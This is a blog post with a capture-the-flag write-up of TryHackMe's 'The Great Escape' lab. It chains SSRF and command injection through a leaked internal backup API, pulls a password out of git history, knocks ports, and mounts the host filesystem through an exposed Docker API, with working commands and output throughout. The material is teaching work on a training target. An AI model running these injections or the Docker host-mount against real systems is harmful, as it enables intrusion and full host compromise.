<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/">ctf/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/">htb/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/"><b>>thm/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/archangel/">archangel/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/hackernote/">hackernote/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass/">overpass/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass2_hacked/">overpass2 hacked/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/overpass3_hosting/">overpass3 hosting/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/the_great_escape/"><b>>the great escape/</b></a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/wreath/">wreath/</a></li>
			</ul>
		</li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<h1>Initial Information</h1>
<blockquote><p>Name, link, creator: The Great Escape (<a href="https://tryhackme.com/room/thegreatescape">tryhackme.com/room/thegreatescape</a>) by <a href="https://tryhackme.com/p/hydragyrum">hydragyrum</a></p>
</blockquote>
<blockquote><p><em>Our devs have created an awesome new site. Can you break out of the sandbox?</em></p>
</blockquote>
<h1>Enumeration</h1>
<p>As always, we can start with an <code>nmap</code> scan to discover open <strong>ports</strong>
and <strong>services</strong> running on these ports.</p>
<h2>http - 80/tcp</h2>
<p>We have a webpage where the <em>Sign up</em> function is <strong>turned off</strong> because they
don't want any <em>rogue accounts</em>.</p>
<p>But <code>/login</code> is allowed. It makes a <strong>POST</strong> request to <code>/api/login</code> with the
data I gave it (<code>asd:bnm</code>) in JSON <code>{username: &quot;asd&quot;, password: &quot;bnm&quot;}</code>.</p>
<h3>File / Directory brute forcing</h3>
<p>We can try to do some directory {and, or} file brute forcing with <code>ffuf</code>
(you can also use <code>gobuster</code>, <code>wfuzz</code> or anything that fits your needs)
but the page gives a <strong>200</strong> response code to anything try to get.</p>
<pre><code>$ ffuf -u http://10.10.230.170/FUZZ -w /opt/SecLists/Discovery/Web-Content/common.txt
---[SNIP]---
.ssh                    [Status: 200, Size: 3834, Words: 141, Lines: 10]
.listings               [Status: 200, Size: 3834, Words: 141, Lines: 10]
api                     [Status: 301, Size: 169, Words: 5, Lines: 8]
</code></pre>
<p>We can also provide the <code>-mc all</code> flag for <code>ffuf</code> to show response codes for every request being made.
And we can see there are a huge amount of <code>503</code>'s which means <strong><em>Service Temporarily Unavailable</em></strong>.</p>
<p><a href="https://http.cat/503">http.cat/503</a>:<br />
<img src="https://http.cat/503" alt="http.cat/503" /></p>
<pre><code>$ ffuf -u http://10.10.230.170/FUZZ -w /opt/SecLists/Discovery/Web-Content/common.txt -mc all
V                       [Status: 503, Size: 197, Words: 7, Lines: 8]
W3SVC3                  [Status: 503, Size: 197, Words: 7, Lines: 8]
XXX                     [Status: 503, Size: 197, Words: 7, Lines: 8]
</code></pre>
<p>This means the server has some kind of <strong>rate limiting</strong> that blocks our fuzzing requests.
We have two options.
<ol>
<li>We can try to delay our requests</li>
<li>Try the most basic files manually with <code>curl</code></li>
</ol>
</p>
<h4>Let's try getting the most basic files</h4>
<p>As the hint suggests: <em>A well known file may offer some help</em> we can try <code>/robots.txt</code>,
and files inside <code>/.well-known/</code> directory.</p>
<pre><code>$ curl http://10.10.230.170/robots.txt
User-agent: *
Allow: /
Disallow: /api/
# Disallow: /exif-util
Disallow: /*.bak.txt$
</code></pre>
<ul>
<li>We got some new endpoints from <code>/robots.txt</code>!</li>
</ul>
<p>The most common file which can be found in the <code>/.well-known/</code> folder
is usually <code>security.txt</code> so we must try this one too on <strong>every target</strong>!</p>
<pre><code>$ curl http://10.10.230.170/.well-known/security.txt
Hey you found me!

The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues.

See https://securitytxt.org/ for more information.

Ping /api/fl46 with a HEAD request for a nifty treat.
</code></pre>
<ul>
<li><a href="https://securitytxt.org/">securitytxt.org</a></li>
<li>We have to make a <strong>HEAD</strong> request to <code>/api/fl46</code> in order to get the flag!</li>
</ul>
<pre><code>$ curl -I http://10.10.230.170/api/fl46
HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Thu, 18 Feb 2021 11:26:34 GMT
Connection: keep-alive
flag: THM{bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX4}
</code></pre>
<ul>
<li>We got our first flag!</li>
</ul>
<p>As the manual (<code>man curl</code>) said <code>-I</code> is used to fetch the HEADers only.</p>
<p><strong><em>Takeaways:</em></strong>
<ul>
<li>Always take a look at <code>/.well-known/security.txt</code> (and also <code>/robots.txt</code>)</li>
<li>Use <code>ffuf</code> with <code>-mc all</code> flag to <strong>show response codes</strong> which will help you identify any weird behavior that you could've missed without the use of this option</li>
</ul>
</p>
<h3>Taking a closer look at robots.txt and its contents</h3>
<p>We have already found out that <code>/robots.txt</code> contains some new paths we haven't tried to access yet.
So let's take a closer look at these ones.</p>
<pre><code>/api/
/exif-util
/*.bak.txt$
</code></pre>
<ul>
<li>We know <code>/api/</code> because we got the flag from there and there is also a login functionality on <code>/api/login</code></li>
<li><code>/*.bak.txt$</code> is new and it means every file which ends with <code>.bak.txt</code> extension</li>
<li><code>/exif-util</code> is also new!</li>
</ul>
<h3>/exif-util</h3>
<p>On this endpoint we can upload a file or we can provide and URL for the file
and the application will show it's metadata.</p>
<p><em>My friends and I initially thought we must exploit this converter / SSRF to get foothold
so we tried a bunch of things and we got some weird errors and stuff like that
which I will show you now.</em></p>
<p>Since the <strong>From URL</strong> option makes a GET request to the URL we provide
we initially thought it was an SSRF so we tried some basic command injection,
requesting local resources and differen URI schemes like <code>file://</code>.</p>
<p>With <code>file:///etc/passwd</code> we got an interesting error saying:</p>
<blockquote><p><em>An error occurred:</em> <strong><em>sun.net.www.protocol.file.FileURLConnection cannot be cast to java.net.HttpURLConnection</em></strong></p>
</blockquote>
<p>This error was verbose enough so we knew it was running <strong>java</strong> in the background.</p>
<p>And if we used <code>nc -lvp 8000</code> on our local box and we requested <code>http://&lt;ATTACKER&gt;:8000</code> we got a request like the following:</p>
<pre><code>$ nc -lvp 8000
listening on [any] 8000 ...
10.10.230.170: inverse host lookup failed: Unknown host
connect to [10.8.2.82] from (UNKNOWN) [10.10.230.170] 36010
GET / HTTP/1.1
TE: gzip, deflate; q=0.5
User-Agent: Java/11.0.8
Host: 10.8.2.82:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
</code></pre>
<p>The user agent (<code>User-Agent: Java/11.0.8</code>) confirmed it was java!</p>
<p>We tried to search for possible entry points and we found a <a href="https://hackerone.com/reports/836877">hackerone report</a>
about an image processor app that used java and it was vulnerable to XXE.
The reporter inserted the payload into the JPEG's XMP header and when the app
processed XMP info it triggered the XXE.
The reporter was able to make a request to an dtd he controlled so he was able
to get the contents of files on the target system.</p>
<p>We tried to reproduce it but the tool mentioned in the report was
some kind of ruby script which didn't work well so we started to do it the manual
way. My friend tried GIMP and I started with <code>exiftool</code>.</p>
<p>Fact: GIMP can view the XMP data of a picture but can NOT write it.</p>
<p>On the other hand, <code>exiftool</code> could write XMP data into the file but it got encoded
when I checked it with <code>strings</code>. I tried it anyways but it wasn't working.
After that I decided to edit the image file by hand with <code>vim</code> and I was able to
change these URL-encoded characters but after uploading the image it still wasn't working.</p>
<p>I tried doing some changes but when I changed too much stuff
I broke the format of the image so the webapp and my image viewer
<code>sxiv</code> couldn't open the file.</p>
<p>But this was the point where we got stuck really hard.</p>
<h3>The guessy part :/</h3>
<p>Okay, so the next part was a bit guessy in my opinion.</p>
<p>So we have the <code>*.bak.txt$</code> robots entry and we have an open webapp at <code>/exif-util</code>.</p>
<p>We must combine these two and we should take a look at <code>/exif-util.bak.txt</code>.
This was a backup of the current <code>/exif-util</code> endpoint which made use of a
<strong>developer backup api</strong>.
Old or developer stuff left on the webserver are usually interesting and might contain bugs.</p>
<p><img src="https://media.giphy.com/media/5HyVZlZYxJPy7IC5Cz/giphy.gif" alt="why" /></p>
<pre><code>$ curl http://10.10.230.170/exif-util.bak.txt
&lt;template&gt;
  &lt;section&gt;
    &lt;div class=&quot;container&quot;&gt;
      &lt;h1 class=&quot;title&quot;&gt;Exif Utils&lt;/h1&gt;
      &lt;section&gt;
        &lt;form @submit.prevent=&quot;submitUrl&quot; name=&quot;submitUrl&quot;&gt;
          &lt;b-field grouped label=&quot;Enter a URL to an image&quot;&gt;
            &lt;b-input
              placeholder=&quot;http://...&quot;
              expanded
              v-model=&quot;url&quot;
            &gt;&lt;/b-input&gt;
            &lt;b-button native-type=&quot;submit&quot; type=&quot;is-dark&quot;&gt;
              Submit
            &lt;/b-button&gt;
          &lt;/b-field&gt;
        &lt;/form&gt;
      &lt;/section&gt;
      &lt;section v-if=&quot;hasResponse&quot;&gt;
        &lt;pre&gt;
          {{ response }}
        &lt;/pre&gt;
      &lt;/section&gt;
    &lt;/div&gt;
  &lt;/section&gt;
&lt;/template&gt;

&lt;script&gt;
export default {
  name: 'Exif Util',
  auth: false,
  data() {
    return {
      hasResponse: false,
      response: '',
      url: '',
    }
  },
  methods: {
    async submitUrl() {
      this.hasResponse = false
      console.log('Submitted URL')
      try {
        const response = await this.$axios.$get('http://api-dev-backup:8080/exif', {
          params: {
            url: this.url,
          },
        })
        this.hasResponse = true
        this.response = response
      } catch (err) {
        console.log(err)
        this.$buefy.notification.open({
          duration: 4000,
          message: 'Something bad happened, please verify that the URL is valid',
          type: 'is-danger',
          position: 'is-top',
          hasIcon: true,
        })
      }
    },
  },
}
&lt;/script&gt;
</code></pre>
<p>There is a line leaking the URL of a developer backup api!</p>
<pre><code>const response = await this.$axios.$get('http://api-dev-backup:8080/exif', {
</code></pre>
<h3>Making use of the backup api</h3>
<p>Initially, I added this backup api to my <code>/etc/hosts</code> file (<code>10.10.230.170 api-dev-backup</code>)
but when I tried to access it it just didn't work. So we must find an other way
to access this <strong>internal</strong> backup api!</p>
<p>We know when we use the <code>From URL</code> option the webapp
makes a GET request to <code>/api/exif?url=&lt;URL_WE_PROVIDE&gt;</code>.
I always prefer using <code>curl</code> or an other cli application over a
bloat gui webbrowser so I will use <code>curl</code> to make request to the api.</p>
<pre><code>$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080'
An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                &lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;head&gt;
    &lt;meta charset=&quot;UTF-8&quot;&gt;
    &lt;title&gt;Nothing to see here&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;

&lt;p&gt;Nothing to see here, move along...&lt;/p&gt;

&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<ul>
<li>We got the contents of the webpage!</li>
</ul>
<h1>Exploitation</h1>
<h2>Command Injection</h2>
<p>We can try to use <code>/exif?url</code> on the backup api and try testing for SSRF {and, or}
command injection!</p>
<p>I initially tried getting a <a href="https://portswigger.net/web-security/os-command-injection">command injection</a>
because it was a <strong><em>developer backup</em></strong> api and development or old backup stuff
is always interesting!</p>
<p>We can start with the most basic command injection which is inserting an arbitrary command after a <code>;</code>.</p>
<pre><code>$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080/exif?url=;id'
An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                An error occurred: File format could not be determined
               Retrieved Content
               ----------------------------------------
               curl: no URL specified!
curl: try 'curl --help' or 'curl --manual' for more information
uid=0(root) gid=0(root) groups=0(root)
</code></pre>
<ul>
<li>It returned the output of our <code>id</code> command in the last line of the output!</li>
<li>This means we have a command injection</li>
</ul>
<p>And the user is <code>root</code> which could mean that we compromised the whole machine by
one command injection but this isn't the situation here.
Looking at the picture of the box we can see it's related to <code>docker</code>
So we should be in a docker container!</p>
<h3>Enumeration</h3>
<p>But heads up! We still got a working command injection and we are root in a
docker container. This means we should enumerate whats available for us!</p>
<p>After some manual exploration we can find a note in <code>/root/dev-note.txt</code>.
And a git repo <code>/root/</code> with some interesting commits storing critical information.
And also a <code>/.dockerenv</code> file which confirms that we are in a docker container.</p>
<p><strong>Basic directory enumeration:</strong></p>
<pre><code>$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080/exif?url=;ls+-la+/'
---[SNIP]---
-rwxr-xr-x  1 root root    0 Jan  7 22:14 .dockerenv
---[SNIP]---

$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080/exif?url=;ls+-la+/root'
---[SNIP]---
total 28
drwx------ 1 root root 4096 Jan  7 16:48 .
drwxr-xr-x 1 root root 4096 Jan  7 22:14 ..
lrwxrwxrwx 1 root root    9 Jan  6 20:51 .bash_history -&gt; /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Jan  7 16:48 .git
-rw-r--r-- 1 root root   53 Jan  6 20:51 .gitconfig
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-rw-r-- 1 root root  201 Jan  7 16:46 dev-note.txt
</code></pre>
<h4>Git enumeration</h4>
<p>For first I used <code>git log</code> to print out every change and its comments.</p>
<pre><code>$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+log'
---[SNIP]---
commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
Author: Hydra &lt;hydragyrum@example.com&gt;
Date:   Thu Jan 7 16:48:58 2021 +0000

    fixed the dev note

commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Author: Hydra &lt;hydragyrum@example.com&gt;
Date:   Wed Jan 6 20:51:39 2021 +0000

    Removed the flag and original dev note b/c Security

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra &lt;hydragyrum@example.com&gt;
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

</code></pre>
<p>We got 3 commits so we should take a look at them.</p>
<pre><code>$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+show+a3d30a7d0510dc6565ff9316e3fb84434916dee8'
---[SNIP]---
+++ b/dev-note.txt
@@ -0,0 +1,9 @@
+Hey guys,
+
+I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.
+
+Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.
+
+Cheers,
+
+Hydra
\ No newline at end of file
diff --git a/flag.txt b/flag.txt
new file mode 100644
index 0000000..aae8129
--- /dev/null
+++ b/flag.txt
@@ -0,0 +1,3 @@
+You found the root flag, or did you?
+
+THM{0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX6}

$ curl 'http://10.10.230.170/api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+show+5242825dfd6b96819f65d17a1c31a99fea4ffb6a'
---[SNIP]---
+++ b/dev-note.txt
@@ -0,0 +1,9 @@
+Hey guys,
+
+Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.
+
+Anyways, the password is fluffybunnies123
+
+Cheers,
+
+Hydra
</code></pre>
<ul>
<li>We got the flag by reading a change in a commit!</li>
<li>We also got some ports we need to <strong>knock</strong> to open a tcp port!</li>
<li>And we got the contents of the note file which contains a username <code>hydra</code> and a password <code>fluffybunnies123</code>!</li>
</ul>
<p>Note that I used <code>+</code> <strong>instead of spaces</strong> in my request <em>to avoid breaking the request</em>.</p>
<p>But when we try to use ssh it just hangs forever. We can try to debug the issue
by turning on verbose mode with <code>-v</code>.</p>
<pre><code>$ ssh hydra@10.10.230.170 -v
OpenSSH_8.4p1 Debian-3, OpenSSL 1.1.1i  8 Dec 2020
---[SNIP]---
debug1: Connecting to 10.10.230.170 [10.10.230.170] port 22.
debug1: Connection established.
---[SNIP]---
debug1: Local version string SSH-2.0-OpenSSH_8.4p1 Debian-3
debug1: kex_exchange_identification: banner line 0: Ub%Vl}&gt;z@&lt;t*wgEToP(dPdR(},
debug1: kex_exchange_identification: banner line 1: :z;\\=|]#^U\\ N!(PkTS?6y\\Cqe
debug1: kex_exchange_identification: banner line 2: X,JZU$Dl&amp;FTmbsrZ~Ki&amp;W.p
</code></pre>
<ul>
<li>The server is sending random stuff at us in the banner forever!</li>
</ul>
<p>This should be <a href="https://github.com/skeeto/endlessh">endlessh</a>!
Which means we have to find an other way to get into the box.</p>
<h2>Trying to get a reverse shell</h2>
<p>I initially tried getting a reverse shell but it didn't work because of some filtering.</p>
<p>I always prefer opening a reverse shell for ease of access.
We can try to use some of the payloads from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">PayloadsAllTheThings Revshell Cheatsheet</a>!</p>
<p>But in this situation when we try to get a reverse shell we will face some issues.</p>
<ol>
<li>There are some filtering on the request body (<code>nc</code> command is blacklisted)</li>
<li>There is no <code>wget</code> on the target and <code>curl</code> just hangs so we couldn't download a <strong>.sh</strong> file which ccontains our reverse shell.</li>
</ol>
<h2>A quick recap on what we have achieved so far</h2>
<p><strong>Going through the things we have so far:</strong>
We have only 2 ports open on the box. 22 being endlessh and 80 being the
vulnerable webserver.
There is also a backup api which can't be accessible from outside the box.
And we also have a possible username and a password from the webserver's docker container.
The deleted note from the webserver mentioned port knocking!</p>
<h2>Port Knocking</h2>
<blockquote><p>Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.</p>
</blockquote>
<p>I wrote a little posix compliant sh script for manual port knocking with <code>curl</code>.
Since POSIX SH does not support arrays I used a string of ports separated by spaces
then I used <code>tr</code> to separate them and read them into the <code>i</code> variable.</p>
<pre><code>#!/bin/sh

TARGET=&quot;10.10.230.170&quot;
PORTS=&quot;42 1337 10420 6969 63000&quot;

echo &quot;$PORTS&quot; | tr ' ' '\n' | while read -r i
do
    echo &quot;knocking $i&quot;
    /usr/bin/curl &quot;$TARGET:$i&quot;
    sleep 1
done
</code></pre>
<p>We can run the script and after that we can start a
new nmap scan to detect newly opened ports on the target system.</p>
<pre><code>$ sh knocker.sh

$ nmap -sC -sV -p- -oN scans/tcpfull_afterknock 10.10.230.170 -vvv
---[SNIP]---
Discovered open port 22/tcp on 10.10.230.170
Discovered open port 80/tcp on 10.10.230.170
Discovered open port 2375/tcp on 10.10.230.170
---[SNIP]---
</code></pre>
<p>We got a new port <code>2375</code>!</p>
<pre><code>2375/tcp open  docker  syn-ack ttl 63 Docker 20.10.2 (API 1.41)
| docker-version:
|   GoVersion: go1.13.15
|   ApiVersion: 1.41
|   Version: 20.10.2
|   BuildTime: 2020-12-28T16:15:09.000000000+00:00
|   Platform:
|     Name: Docker Engine - Community
|   Arch: amd64
|   Os: linux
|   KernelVersion: 4.15.0-130-generic
|   MinAPIVersion: 1.12
|   GitCommit: 8891c58
|   Components:
|
|       Details:
|         KernelVersion: 4.15.0-130-generic
|         Experimental: false
|         ApiVersion: 1.41
|         BuildTime: 2020-12-28T16:15:09.000000000+00:00
|         Arch: amd64
|         Os: linux
|         GoVersion: go1.13.15
|         GitCommit: 8891c58
|         MinAPIVersion: 1.12
|       Name: Engine
|       Version: 20.10.2
|
|       Details:
|         GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
|       Name: containerd
|       Version: 1.4.3
|
|       Details:
|         GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
|       Name: runc
|       Version: 1.0.0-rc92
|
|       Details:
|         GitCommit: de40ad0
|       Name: docker-init
|_      Version: 0.19.0
</code></pre>
<h2>Attacking docker</h2>
<p>Searching for docker vulnerabilities I found an interesting post:
<a href="https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/">Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners</a></p>
<p>There is an option in docker to connect to a remote system and run
docker commands on it by specifying a <code>-H &lt;TARGET:PORT&gt;</code> flag!</p>
<pre><code>$ docker -H 10.10.230.170:2375 image ls
REPOSITORY                                    TAG       IMAGE ID       CREATED         SIZE
exif-api-dev                                  latest    4084cb55e1c7   6 weeks ago     214MB
exif-api                                      latest    923c5821b907   6 weeks ago     163MB
frontend                                      latest    577f9da1362e   6 weeks ago     138MB
endlessh                                      latest    7bde5182dc5e   6 weeks ago     5.67MB
nginx                                         latest    ae2feff98a0c   2 months ago    133MB
debian                                        10-slim   4a9cd57610d6   2 months ago    69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   2 months ago    103MB
alpine                                        3.9       78a2ce922f86   10 months ago   5.55MB
</code></pre>
<ul>
<li>These are <strong>not</strong> my local images!</li>
<li>This means I can run docker commands on the target remote server!</li>
</ul>
<p>The article also talks about executing commands inside a container on a remote server!</p>
<p>Since there are already some images downloaded I skip the download image step.
But I have to start a container and run some commands inside them!</p>
<p>I made use of <a href="https://gtfobins.github.io/gtfobins/docker/#shell">GTFOBins docker</a> page.</p>
<pre><code>$ docker -H 10.10.230.170:2375 run -v /:/mnt --rm -it -d alpine:3.9
</code></pre>
<p>We can list the containers to check if our alpine is running.</p>
<pre><code>$ docker -H 10.10.230.170:2375 container ls
CONTAINER ID   IMAGE          COMMAND                  CREATED          STATUS          PORTS                  NAMES
1c04b4ad5e08   alpine:3.9     &quot;/bin/sh&quot;                47 seconds ago   Up 31 seconds                          elegant_galileo
49fe455a9681   frontend       &quot;/docker-entrypoint.…&quot;   6 weeks ago      Up 3 hours      0.0.0.0:80-&gt;80/tcp     dockerescapecompose_frontend_1
4b51f5742aad   exif-api-dev   &quot;./application -Dqua…&quot;   6 weeks ago      Up 3 hours                             dockerescapecompose_api-dev-backup_1
cb83912607b9   exif-api       &quot;./application -Dqua…&quot;   6 weeks ago      Up 3 hours      8080/tcp               dockerescapecompose_api_1
548b701caa56   endlessh       &quot;/endlessh -v&quot;           6 weeks ago      Up 3 hours      0.0.0.0:22-&gt;2222/tcp   dockerescapecompose_endlessh_1
</code></pre>
<p>Now, we can try to execute commands in the docker container which is on the target system.</p>
<pre><code>$ docker -H 10.10.230.170:2375 exec elegant_galileo ls
bin
dev
etc
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
</code></pre>
<ul>
<li>We successfully executed the ls command! On the container which is running on the target host!</li>
</ul>
<p>Now, we can search for the last flag under <code>/mnt</code> in the container.</p>
<pre><code>$ docker -H 10.10.230.170:2375 exec elegant_galileo ls /mnt/root
flag.txt

$ docker -H 10.10.230.170:2375 exec elegant_galileo cat /mnt/root/flag.txt
Congrats, you found the real flag!

THM{cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX4}
</code></pre>
<p>We successfully got the root flag by using <strong>port knocking</strong>, and an <strong>open docker port</strong> which allowed us to <strong><em>run docker commands on the target system</em></strong>!</p>
<hr />
<p>The box was a little unstable (the ssrf didn't work) for some days
but after it got a patch everything went fine!</p>
<p>The initial part was a basic SSRF and command injeciton after we found that
backup file. <strong>--&gt; Takeaway: always try to find backups for the known endpoints!</strong></p>
<p>BUT this docker technique was new for me! And I loved it!
This <code>-H</code> flag is a great one!
Thank you <a href="https://tryhackme.com/p/hydragyrum">hydragyrum</a>!</p>
</div>

</div>

<hr /><hr />
<footer>
	<p>Author: M4t35Z</p>
	<p><a href="https://www.buymeacoffee.com/m4t35z">Support the creator (buymeacoffee)</a></p>
	<p><i>Created with <a href="https://github.com/karlb/smu/">smu</a> + <a href="https://git.suckless.org/sites/">suckless style</a></i></p>
</footer>
</html>
